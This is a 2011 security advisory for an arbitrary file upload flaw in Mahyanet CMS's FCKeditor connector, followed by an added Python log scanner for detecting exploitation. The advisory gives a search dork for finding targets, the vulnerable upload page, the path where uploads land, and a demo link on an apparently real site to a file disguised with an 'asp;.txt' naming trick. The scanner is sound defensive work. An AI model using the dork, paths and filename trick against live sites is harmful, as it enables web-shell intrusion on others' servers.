Mahyanet Cms (FCKeditor) Arbitrary File Upload Vulnerability

2011.07.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

@ Mahyanet Cms (FCKeditor) Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
@ Name: Mahyanet Cms (FCKeditor) Arbitrary File Upload Vulnerability
@ Vendor: http://mahyanet.com
@ Date: 2011-07-04
@ Author: Ashiyane Digital Security Team
@ Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,Exploit-db.com
@ Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
@ Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
[+] Dork: intext:"Powered by : Mahyanet.com"
--------------------------------------------------------------------------------
[+] Vulnerabilities ~>

[+] Vulnerability: http://127.0.0.1/Mahyanet/fckeditor/editor/filemanager/connectors/test.html

[+] Uploaded Path: http://127.0.0.1/Mahyanet/fckeditor/editor/images/userfiles/file/[Your File]

[+] Demo : http://www.tanhadairy.com/fckeditor/editor/images/userfiles/file/he.asp;(1)(1).txt
--------------------------------------------------------------------------------
===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ BehroozIce,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
@ Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk
@ mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206
@ 1337 Member:
@ r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger
@ Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,
===========================================================================
<<./By XroGuE >>
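
For triage on a site running this CMS, both paths named in the advisory can be searched for in web server access logs: hits on the connector test page, and files in the upload directory whose name carries a script extension in any position, as in the demo file name. The Python below is an added example, not part of the original advisory; it assumes combined-format access logs, and the script-extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths as given in the advisory (matched case-insensitively).
CONNECTOR_TEST = "/fckeditor/editor/filemanager/connectors/test.html"
UPLOAD_DIR = "/fckeditor/editor/images/userfiles/"
# Assumption: extensions treated as server-side script; adjust per server.
SCRIPT_EXTS = {"asp", "aspx", "asa", "cer", "php", "jsp"}
# Assumption: combined log format, request line is the first quoted field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jul/2011:10:00:01 +0000] "GET /Mahyanet/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Jul/2011:10:00:09 +0000] "GET /Mahyanet/fckeditor/editor/images/userfiles/file/x.asp;(1).txt HTTP/1.1" 200 12',
    '198.51.100.4 - - [04/Jul/2011:10:01:00 +0000] "GET /Mahyanet/fckeditor/editor/images/userfiles/file/logo.png HTTP/1.1" 200 901',
]


def has_hidden_script_ext(filename):
    """True if any '.'- or ';'-separated part after the base name is a script extension."""
    parts = re.split(r"[.;]", filename.lower())
    return any(p in SCRIPT_EXTS for p in parts[1:])


def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # urlsplit (unlike urlparse) keeps ';...' inside the path, so the full name is checked.
    path = unquote(urlsplit(m.group("target")).path)
    lower = path.lower()
    if lower.endswith(CONNECTOR_TEST):
        return "connector-test-page"
    if UPLOAD_DIR in lower and has_hidden_script_ext(path.rsplit("/", 1)[-1]):
        return "script-in-upload-dir"
    return None


def scan(lines):
    """Return (label, line) pairs for every log line that matches a check."""
    return [(label, line) for line in lines if (label := classify(line))]


if __name__ == "__main__":
    for label, line in scan(SAMPLE_LOG):
        print(label, "|", line)
```

The same `has_hidden_script_ext` check can be applied to a directory listing of the upload folder to find files already written there.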

